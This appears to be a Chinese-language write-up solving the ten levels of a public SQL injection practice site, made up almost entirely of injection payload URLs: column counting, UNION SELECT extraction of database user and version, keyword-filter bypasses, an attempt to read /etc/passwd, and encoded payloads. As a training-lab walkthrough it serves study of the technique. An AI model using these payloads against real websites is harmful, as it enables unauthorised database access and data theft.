平台:

http://www.zixem.altervista.org/SQLi/

Level 1 (Super Easy)

http://www.zixem.altervista.org/SQLi/level1.php?id=1

http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=2--+ #false

3 columns

http://www.zixem.altervista.org/SQLi/level1.php?id=1 order by 3--+

http://www.zixem.altervista.org/SQLi/level1.php?id=-1 +UNION+ALL+SELECT+1,2,3--+

MySQL information

http://www.zixem.altervista.org/SQLi/level1.php?id=-1 +UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3--+

Level 2 (Easy)

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4' and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4' and 1=2--+ #false

Find ccolumns

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4' +ORDER+BY+4--+

Showprofile 发现无回显,我们将其改成showprofile=1

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=1' +UNION+ALL+SELECT+1,2,3,4--+

Find mysql information

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=1' +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4--+

或者

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=1' +UNION+ALL+SELECT+version(),database(),user(),4--+

Level 3 (Medium)

http://www.zixem.altervista.org/SQLi/level3.php?item=3

http://www.zixem.altervista.org/SQLi/level3.php?item=3' and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/level3.php?item=3' and 1=2--+ #false

Find 4 columns

http://www.zixem.altervista.org/SQLi/level3.php?item=3' +ORDER+BY+4--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3' +UNION+ALL+SELECT+1,2,3,4--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3' +UNIONON+ALL+SELECT+1,2,3,4--+

发现无回显,我们尝试更改item的值试试

http://www.zixem.altervista.org/SQLi/level3.php?item=1' +UNIONON+ALL+SELECT+1,2,3,4--+

在字段2上进行查询MySQL information

http://www.zixem.altervista.org/SQLi/level3.php?item=1' +UNIONON+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4--+

Level 4 (Normal)

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7' and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7' and 1=2--+ #false

Find 5 columns

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7' +ORDER+BY+5--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7' +UNION+ALL+SELECT+1,2,3,4,5--+

执行发现无相关的字段回显,我们尝试更改下ebookid的值试试

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=1' +UNION+ALL+SELECT+1,2,3,4,5--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=1' +UNION+ALL+SELECT+version(),user(),database(),4,5--+

Level 5 (Get your "bot-writing" skills)

http://www.zixem.altervista.org/SQLi/login_lvl5.php

抓包请求如下:

GET /SQLi/login_do.php?pass=123456 HTTP/1.1

Host: www.zixem.altervista.org

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://www.zixem.altervista.org/SQLi/login_lvl5.php

Cookie: __cfduid=d1cf89af0193d0a51fc76036c94593eca1547429536

Connection: close

Upgrade-Insecure-Requests: 1

通过查看sourcecode如下

If you want a lead, enter this password.

~~~~~~~~~~~~~~~~~~ password: d1fd6ef9af6cb677e09b1b0a68301e0c ~~~~~~~~~~~~~~~~~~~~~~

owh...it's hashed! maybe you could get some help from my md5 cracker...

~~~~~~~~~~~~~~~~~~~~~~~~here: /SQLi/md5cracker.php~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.zixem.altervista.org/SQLi/md5cracker.php?hash=d1fd6ef9af6cb677e09b1b0a68301e0c

Level 6 (Experienced)

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10 and 1=1#true

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10 and 1=2 #false

Find 4 columns

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10 +ORDER+BY+4

这里判断为整形的盲注,直接用穿山甲(pangolin)跑

Level 7 (Medium)

http://www.zixem.altervista.org/SQLi/level7.php?id=1

http://www.zixem.altervista.org/SQLi/level7.php?id=1 and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/level7.php?id=1 and 1=2--+ #false

Find 3 columns

http://www.zixem.altervista.org/SQLi/level7.php?id=1 +ORDER+BY+3--+

http://www.zixem.altervista.org/SQLi/level7.php?id=1 +UNION+ALL+SELECT+1,2,3--+

无任何回显,更改id也无回显查看源码

最后尝试payload为如下:

http://www.zixem.altervista.org/SQLi/level7.php?id=2 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--+

Level 8 (Hard)

尝试注入点:

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1\

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\' at line 1 ID:

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ID:

Age:

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and 1=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'/**/and/**/1=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1 and 1=1

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and '1'='1--+

 

想下特殊符号的过滤

A plus sign (+)

A simple URL encoded space (%20)

A null byte (%00)

A newline (%0a)

A tab (%09)

A carriage return (%0d)

空格%20

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1 #false

空字节%00

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%00and%001=1--+ #false

换行\n %0a

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0aand%0a1=1--+ #false

Tab %09

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1-- #true

回车%0d

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0dsand%0d1=1--+ #flase

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1-- #true

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=2-- #false

Find 3 columns

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09ORDER%09BY%093--

枚举具体列报错:

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09SELECT%091,2,3--

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1,2,3--' at line 1 ID:

Age:

看起来好像是屏蔽了select字段,我们尝试绕过

#大小写混

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09/*!SeLECt*/%091,2,3-- #false

#Url encode

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09/*!%53eLEct*/%091,2,3-- #false

#使用特助字符

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09sel*ect%091,2,3-- #flase

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09se/**/lect%091,2,3-- #false

#关键字替换

SEselectLECT

SELSELECTECT

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09SEselectLECT%091,2,3-- #true

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09ALL%09SELSELECTECT%091,2,3-- #true

wow

最终的payload如下:

http://www.zixem.altervista.org/SQLi/lvl8.php?id=2%09UNION%09ALL%09SELSELECTECT%091,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--

Level 9 (Medium)

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=1--+ #true

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=12--+ #false

Find 2 columns

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' +ORDER+BY+2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1'+UNION+ALL+SELECT+1,2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1 and 1=2' union select "../etc/passwd","2"--'

Level 10 (Pro)

http://www.zixem.altervista.org/SQLi/lvl10.php?x=ISwwYGAKYAo=

ISwwYGAKYAo=   ---- it looks like base64encode

https://www.base64decode.org/---->

!,0``

`

这种编码方式要用Uuencode decoder 进行解码

https://www.textencode.com/uudecode

构造注入语句

1 AND 1=2 UNION SELECT 1,2--

https://www.textencode.com/uuencode

<,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+#(M+0``

`

Base64encode

PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

paylaod:

http://www.zixem.altervista.org/SQLi/lvl10.php?x=PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

构造注入语句

1 AND 1=2 UNION SELECT 1,CONCAT(user()," ",version())--

Encode

M,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+$-/3D-!5"AU<V5R*"DL(B`B+'9E

*<G-I;VXH*2DM+0``

`

Base64encode

TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg

http://www.zixem.altervista.org/SQLi/lvl10.php?x=TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg

SQL Challenges的更多相关文章

  1. SQL Challenges靶机

    http://www.zixem.altervista.org/SQLi/ 第一关 http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1 ...

  2. SQL注入测试平台 SQLol -6.CHALLENGES挑战

    SQLol上面的挑战共有14关,接下来我们一关一关来突破. Challenge 0 目的是让查询返回所有的用户名,而不是只有一个. SELECT username FROM users WHERE u ...

  3. sql注入学习小结

    /* 转载请注明出处,By:珍惜少年时 小知识,只是放在博客吃饭时无聊看看,大牛勿喷. */ 珍惜少年时博客,专注网络安全 web渗透测试 00x1爆所有库: mysql> select sch ...

  4. Red Gate - SQL Source Control实现对SQL SERVER 的源代码控制

    原文地址:http://bbs.csdn.net/topics/350165431 SQL Server 一直没有一款很好的源码控制器,之前自己曾尝试自己写一个,将所有的 脚本 自动生成到某一目录下, ...

  5. Red Gate系列之二 SQL Source Control 3.0.13.4214 Edition 数据库版本控制器 完全破解+使用教程

    原文:Red Gate系列之二 SQL Source Control 3.0.13.4214 Edition 数据库版本控制器 完全破解+使用教程 Red Gate系列之二 SQL Source Co ...

  6. Linux 安装Xampp以后,Apache服务器无法启动,以及启动后,连接sql数据库遇到的问题的解决方法

    xampp安装以后,搭建服务器的时候,我们会遇到哪些问题呢?1.MySQL Database 可以启动,而Apache Web Server无法启动?应该是80端口被占用,那么如何解决呢?我们可以通过 ...

  7. SQLI LABS Challenges Part(54-65) WriteUp

    终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...

  8. Stream Processing 101: From SQL to Streaming SQL in 10 Minutes

    转自:https://wso2.com/library/articles/2018/02/stream-processing-101-from-sql-to-streaming-sql-in-ten- ...

  9. 【技巧总结】Penetration Test Engineer[3]-Web-Security(SQL注入、XXS、代码注入、命令执行、变量覆盖、XSS)

    3.Web安全基础 3.1.HTTP协议 1)TCP/IP协议-HTTP 应用层:HTTP.FTP.TELNET.DNS.POP3 传输层:TCP.UDP 网络层:IP.ICMP.ARP 2)常用方法 ...

随机推荐

  1. FCC(ES6写法) No repeats please

    把一个字符串中的字符重新排列生成新的字符串,返回新生成的字符串里没有连续重复字符的字符串个数.连续重复只以单个字符为准. 例如, aab 应该返回 2 因为它总共有6中排列 (aab, aab, ab ...

  2. 别以为真懂Openstack: 虚拟机创建的50个步骤和100个知识点(1)

    还是先上图吧,无图无真相 别以为真懂Openstack!先别着急骂我,我也没有说我真懂Openstack 我其实很想弄懂Openstack,然而从哪里下手呢?作为程序员,第一个想法当然是代码,Code ...

  3. 【RL-TCPnet网络教程】第19章 RL-TCPnet之BSD Socket服务器

    第19章      RL-TCPnet之BSD Socket服务器 本章节为大家讲解RL-TCPnet的BSD Socket,学习本章节前,务必要优先学习第18章的Socket基础知识.有了这些基础知 ...

  4. [Swift]LeetCode145. 二叉树的后序遍历 | Binary Tree Postorder Traversal

    Given a binary tree, return the postorder traversal of its nodes' values. Example: Input: [1,null,2, ...

  5. [Swift]LeetCode303. 区域和检索 - 数组不可变 | Range Sum Query - Immutable

    Given an integer array nums, find the sum of the elements between indices i and j (i ≤ j), inclusive ...

  6. JS设计模式之单例模式

    单例模式 单例模式的定义是:保证一个类只有一个实例,并提供一个访问它的全局访问点.比如说购物车,在一个商城中,我们只需要一个购物车,购物车在整个商城中是唯一的,不需要多次创建,即使多次点击购物车按钮, ...

  7. Qt之二进制兼容

    一.回顾 使用qt2年多了,但是还是觉得很陌生,总是会被qt搞的很紧张,有时候当我自信满满的打开帮助文档,搜索某个已知的类时,由于笔误敲错了一个字母而出现了另外一个类,不过奇怪的是还真有这么一个类,哎 ...

  8. Spring Boot Cache配置 序列化成JSON字符串

    当我们使用@Cacheable注解的时候会将返回的对象缓存起来,我们会发现默认缓存的值是二进制的,不方便查看,为此我们自定义序列化配置,改成JSON格式的 配置如下: pom.xml <?xml ...

  9. 我的2017OKR - 年中回顾

    自从订阅了吴军老师的<硅谷来信>之后,对其中一篇介绍Google的目标管理方法OKR的文章记忆犹新.想到自己喜欢在每年年初的时候给自己定制一些规划,于是乎了解了一下OKR并重构了一下我的2 ...

  10. 根据bootstrap框架实现移动端触摸滑动的方法

    有一个移动端的项目要求用jquery+bootstrap,其中有一个轮播图,需求是要求可以手触滑动,但是bootstrap中没有写手触滑动的方法,自己琢磨着写了出来,供大家参考. $(function ...